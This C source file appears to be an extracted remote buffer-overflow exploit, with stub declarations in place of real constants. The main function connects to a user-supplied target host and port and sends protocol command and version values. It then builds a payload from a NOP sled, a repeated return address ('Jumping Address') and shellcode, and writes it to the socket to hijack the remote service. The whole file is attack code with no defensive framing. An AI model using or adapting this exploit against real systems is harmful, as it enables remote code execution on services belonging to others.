
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int target ;
struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
struct in_addr {int dummy; } ;
struct hostent {int h_length; int h_addr; int h_addrtype; } ;
typedef char* caddr_t ;


 int ADJUST ;
 int AF_INET ;
 int COMMAND ;
 int MAXBUF ;
 int NOP ;
 int RET ;
 int SOCK_STREAM ;
 size_t STR1_SIZE ;
 int TARGET_PORT ;
 int VERSION ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int inet_addr (char*) ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int putint (int,int ) ;
 int shellcode ;
 int socket (int ,int ,int ) ;
 int strlen (int ) ;
 int term (int,int ) ;
 int write (int,char*,int) ;

main(int argc,char *argv[])
{
    int sockfd,i;
    struct in_addr addr;
    struct sockaddr_in target;
    struct hostent *hs;
    char buf[MAXBUF];

    if (argc<2){
        printf("usage : %s TargetHost\n",argv[0]);
        exit(1);
    }
    sockfd=socket(AF_INET, SOCK_STREAM, 0);
    target.sin_family=AF_INET;
    target.sin_port=htons(TARGET_PORT);
    if ((target.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if ((hs=gethostbyname(argv[1]))==((void*)0)){
            printf("Can not resolve specified host.\n");
            exit(1);
        }
        target.sin_family = hs->h_addrtype;
        memcpy((caddr_t)&target.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sockfd, (struct sockaddr*)&target, sizeof(target))!=0){
        printf("Can not connect to %s:%d\n",argv[1],TARGET_PORT);
        exit(1);
    }
    putint(sockfd,COMMAND);
    putint(sockfd,VERSION);

    memset(buf,NOP,MAXBUF);
    printf("Jumping Address=%x\n",RET);
    for (i=100+ADJUST;i<400+ADJUST;i+=4){
        buf[i+3]=(RET>>24)&0xff;
        buf[i+2]=(RET>>16)&0xff;
        buf[i+1]=(RET>>8)&0xff;
        buf[i+0]=RET&0xff;
    }
    buf[STR1_SIZE]=0;
    buf[MAXBUF-1]=0;
    memcpy(buf+600+ADJUST,shellcode,strlen(shellcode));
    write(sockfd,buf,MAXBUF);
    printf("Connected to %d\n",TARGET_PORT);
    term(sockfd,0);
}
